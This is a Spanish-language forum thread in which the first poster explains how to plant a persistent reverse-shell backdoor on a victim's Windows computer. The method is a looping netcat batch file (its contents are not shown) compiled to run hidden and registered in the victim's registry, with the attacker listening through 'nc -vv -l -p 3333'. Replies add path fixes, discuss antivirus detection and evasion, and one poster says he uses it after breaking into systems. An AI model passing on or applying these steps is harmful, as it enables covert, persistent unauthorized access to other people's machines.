Bueno posteo mi forma de dejar un backdoor reverse shell:

Creo el siguiente bat:


Si ejecuto el siguiente bat intentara la conexion a x.x.x.x aproximadamente cada minuto creando un bucle infinito.
(Podemos quitar la linea del ping para que intente la conexion infinitamente).

El problema de la ejecución de este backdoor es el cuadro de dialogo de secuencia de comandos. Para poder ocultarlo compilamos el bat con quick batch file compiler triando la opcion ghost application para que oculte el cuadro.
Finalmente añadimos el exe en el registro de la victima y con tansolo poner en nuestra shell: nc -vv -l -p 3333 obtendremos su shell, y si cerramos la conexion la podremos volver a obtener del mismo metodo.

Nose si alguien ya utilizo este metodo.. yo solo he visto utilizar backdoors revere shell con comandos at. Bueno espero que sirva igual.

Creo que es importante decir, que el bat debe estar en la misma ruta del NC de la victima para que funcione, si no saltará un error, ya que no podrá ejecutar Nc al no encontrar Netcat.

Para que sea compresible, si creamos un bat simple

::No pongamos el @echo off
echo hola
pause
exit

veremos que, al abrirlo, estaremos en la ruta %userprofile%\escritorio>

Con lo cual, o ponemos en bat en la misma carpeta que el nc, o en el bat podemos hacer un:

cd \
cd nc
::por ejemplo

Pero si no, la idea está muy bien!
Un saludo!

lo e probado y funciona bastante bien, la manera de hacer el "timer" para el bucle me parece muy ingeniosa XD mira que usar un ping es algo muy original.

salu2 y gracias por compartirlo

Seria lo mismo..

Saludos!!

Prueva de ponerlo en otra carpeta que no sea system32, si te funciona seguramente seran los permisos. Mira las cuentas que tienes y asegurate que eres admin.

Si no te funciona asegurate de no tener ningun tipo de programa antivirus. Haz un net start y mira que no tengas ningun antivirus o programa parecido, y mira los procesos.


Si no es nada de esto pillate un antivirus y haz un repasso a tu disco.

Saludos

Yo lo utilizo como backdoor tras la penetracion, ya me encargo de que el antivirus no lo detecte. Aun asi no creas que muchos antivirus lo detecten.. con mas de uno no ha echo falta ni desactivarlo.

pero eske el nc. es detectado por los antivrus mas buenos..  kasprsky nod32,  panda, bla bla bla...  podra ser que muchos otros ni encuenta. pero seciyamente ay que resar  que la otra  tenga norton.. xD

Hola

Es increíble que al día de hoy esto todavía funciona divinamente